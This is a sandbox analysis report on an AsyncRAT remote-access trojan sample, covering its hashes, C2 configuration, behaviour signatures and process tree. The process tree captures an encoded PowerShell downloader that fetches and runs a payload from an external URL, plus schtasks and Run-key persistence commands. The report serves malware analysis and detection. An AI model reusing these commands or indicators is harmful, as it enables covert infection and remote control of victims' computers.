Overview

overview

10

Static

static

dridex

windows10-1703-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    149s
  • platform
    windows10-1703_x64
  • resource
    win10-20220812-en
  • resource tags

    arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
  • submitted
    27-12-2022 07:17

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    0de5d8b27608374949ef0271695ecab50c3b8384cfd875e2679b4a7a1772ac03.exe

  • Size

    5KB

  • MD5

    80b5367dce5fa3438971148c591192bb

  • SHA1

    e64e614bdc92464d237706a1ec8f16c4d030771a

  • SHA256

    0de5d8b27608374949ef0271695ecab50c3b8384cfd875e2679b4a7a1772ac03

  • SHA512

    0ec3553f437de1de9a3fc04013626cb3dc55e33ecdd26480383782f4b40c36119b985663a190c2ebdbf021b0252d27108a8c9a08df8adcd88153e3efbe5df1f3

  • SSDEEP

    96:gf53TE79fkCFHGHtZsfvk+JCAYBsRvk+JCnSvFd3ojXLrl:O53O9fPFmHryvkUY6vkdaFd6

Score
10/10
asyncratdefendersmartscrenpersistencerat

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

DefenderSmartScren

C2

217.64.31.3:8437

Mutex

DefenderSmartScren

Attributes
  • delay

    3

  • install

    false

  • install_file

    SecurityHealtheurvice.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

    ratasyncrat
  • Async RAT payload 2 IoCs
    rat
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0de5d8b27608374949ef0271695ecab50c3b8384cfd875e2679b4a7a1772ac03.exe
    "C:\Users\Admin\AppData\Local\Temp\0de5d8b27608374949ef0271695ecab50c3b8384cfd875e2679b4a7a1772ac03.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2692
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZAByACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANQA2ADYANQAzADEANgA0ADAAOAA4ADEAMwA5ADgAMQA3AC8AMQAwADUANgA2ADUAMwA4ADMAMgAzADUAOAAyADAANwA2ADAAOQAvAFMAZQBjAHUAcgBpAHQAeQBIAGUAYQBsAHQAaABTAGUAcgB2AGkAYwBlAC4AZQB4AGUAJwAsACAAPAAjAGcAZwB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAaAB1AGgAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcgB2AGkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMwAuAGUAeABlACcAKQApADwAIwB3AHkAYgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBiAHAAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwB2AHUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMwAuAGUAeABlACcAKQA8ACMAZABjAHIAIwA+AA=="
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:5056
      • C:\Users\Admin\AppData\Roaming\3.exe
        "C:\Users\Admin\AppData\Roaming\3.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4108
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          #cmd
          4⤵
            PID:3968
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            #cmd
            4⤵
              PID:2044
            • C:\Windows\SysWOW64\cmd.exe
              "cmd" /C schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2964
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService' -Value '"C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe"' -PropertyType 'String'
              4⤵
              • Adds Run key to start application
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2332
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
        1⤵
        • Creates scheduled task(s)
        PID:4396

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Initial Access

      Execution

      Scheduled Task

      1
      T1053

      Persistence

      Registry Run Keys / Startup Folder

      1
      T1060

      Scheduled Task

      1
      T1053

      Privilege Escalation

      Scheduled Task

      1
      T1053

      Defense Evasion

      Modify Registry

      1
      T1112

      Credential Access

      Discovery

      System Information Discovery

      1
      T1082

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        80a57786a71a488e7e713d9bc29b9151

        SHA1

        dbafdffe3de0be27a2cfb99a9aea6ab3e2c14cd8

        SHA256

        7853f23fc43470ded00be7c7d1155de28054817c620560ffbab94ebf1386f9ac

        SHA512

        a6b72a3dba7a8b8b37aef10a38a6ac7b73f971800f0c3a88797c8f982e424b7e627103e83de339fe435e4311fa956f8cf02c7b80ede899d834701d08d9e089d6

        Download Submit
      • C:\Users\Admin\AppData\Roaming\3.exe
        Filesize

        87KB

        MD5

        ca699117112a173ca7b289f1baf6c3c0

        SHA1

        862f227d4fa0b4de892006d7fe19e610e9f1a676

        SHA256

        db805d5ac09ea9d18a3016d4c70cbb52087604fe5ad23fd8043399c970c0c8a6

        SHA512

        d9f82f6e18ce2eb624a5ee1e20618318fde7ffdcff834d9c0291f4971bd72ce9b7f5108bf45f11ceed4d1f526bad4842913e833a25e3d99a3235d6f87b4d2620

        Download Submit
      • C:\Users\Admin\AppData\Roaming\3.exe
        Filesize

        87KB

        MD5

        ca699117112a173ca7b289f1baf6c3c0

        SHA1

        862f227d4fa0b4de892006d7fe19e610e9f1a676

        SHA256

        db805d5ac09ea9d18a3016d4c70cbb52087604fe5ad23fd8043399c970c0c8a6

        SHA512

        d9f82f6e18ce2eb624a5ee1e20618318fde7ffdcff834d9c0291f4971bd72ce9b7f5108bf45f11ceed4d1f526bad4842913e833a25e3d99a3235d6f87b4d2620

        Download Submit
      • memory/2332-191-0x0000000000000000-mapping.dmp
        Download
      • memory/2332-312-0x00000000071E0000-0x0000000007808000-memory.dmp
        Filesize

        6.2MB

        Download
      • memory/2332-588-0x0000000009550000-0x0000000009558000-memory.dmp
        Filesize

        32KB

        Download
      • memory/2332-380-0x00000000095B0000-0x0000000009644000-memory.dmp
        Filesize

        592KB

        Download
      • memory/2332-370-0x00000000093D0000-0x0000000009475000-memory.dmp
        Filesize

        660KB

        Download
      • memory/2332-360-0x0000000009280000-0x000000000929E000-memory.dmp
        Filesize

        120KB

        Download
      • memory/2332-359-0x00000000092A0000-0x00000000092D3000-memory.dmp
        Filesize

        204KB

        Download
      • memory/2332-343-0x00000000081E0000-0x0000000008256000-memory.dmp
        Filesize

        472KB

        Download
      • memory/2332-607-0x00000000096A0000-0x00000000096C2000-memory.dmp
        Filesize

        136KB

        Download
      • memory/2332-338-0x0000000007890000-0x00000000078AC000-memory.dmp
        Filesize

        112KB

        Download
      • memory/2332-606-0x0000000009650000-0x000000000966A000-memory.dmp
        Filesize

        104KB

        Download
      • memory/2332-334-0x0000000007AD0000-0x0000000007E20000-memory.dmp
        Filesize

        3.3MB

        Download
      • memory/2332-333-0x0000000007A60000-0x0000000007AC6000-memory.dmp
        Filesize

        408KB

        Download
      • memory/2332-332-0x00000000079F0000-0x0000000007A56000-memory.dmp
        Filesize

        408KB

        Download
      • memory/2332-330-0x0000000007130000-0x0000000007152000-memory.dmp
        Filesize

        136KB

        Download
      • memory/2332-192-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2332-307-0x00000000046C0000-0x00000000046F6000-memory.dmp
        Filesize

        216KB

        Download
      • memory/2332-197-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2332-339-0x0000000007F20000-0x0000000007F6B000-memory.dmp
        Filesize

        300KB

        Download
      • memory/2332-583-0x0000000009560000-0x000000000957A000-memory.dmp
        Filesize

        104KB

        Download
      • memory/2332-200-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2332-194-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2692-118-0x0000000000030000-0x0000000000038000-memory.dmp
        Filesize

        32KB

        Download
      • memory/2964-196-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2964-193-0x0000000000000000-mapping.dmp
        Download
      • memory/2964-199-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2964-202-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2964-203-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2964-211-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3968-207-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3968-210-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3968-213-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3968-214-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3968-215-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3968-212-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3968-209-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3968-206-0x000000000040D06E-mapping.dmp
        Download
      • memory/3968-205-0x0000000000400000-0x0000000000412000-memory.dmp
        Filesize

        72KB

        Download
      • memory/4108-163-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4108-187-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4108-198-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4108-201-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4108-190-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4108-188-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4108-185-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4108-183-0x00000000056B0000-0x0000000005BAE000-memory.dmp
        Filesize

        5.0MB

        Download
      • memory/4108-182-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4108-143-0x0000000000000000-mapping.dmp
        Download
      • memory/4108-180-0x0000000000A20000-0x0000000000A3C000-memory.dmp
        Filesize

        112KB

        Download
      • memory/4108-179-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4108-177-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4108-176-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4108-208-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4108-174-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4108-173-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4108-204-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4108-171-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4108-169-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4108-168-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4108-167-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4108-166-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4108-164-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4108-162-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4108-161-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4108-189-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4108-195-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4108-186-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4108-184-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4108-181-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4108-178-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4108-175-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4108-172-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4108-170-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4108-165-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4108-160-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4108-159-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4108-158-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4108-157-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4108-156-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4108-155-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4108-153-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4108-152-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4108-151-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4108-150-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4108-149-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4108-148-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4108-147-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4108-145-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4396-219-0x0000000000000000-mapping.dmp
        Download
      • memory/5056-128-0x00000156F97A0000-0x00000156F9816000-memory.dmp
        Filesize

        472KB

        Download
      • memory/5056-124-0x00000156F8C50000-0x00000156F8C72000-memory.dmp
        Filesize

        136KB

        Download
      • memory/5056-119-0x0000000000000000-mapping.dmp
        Download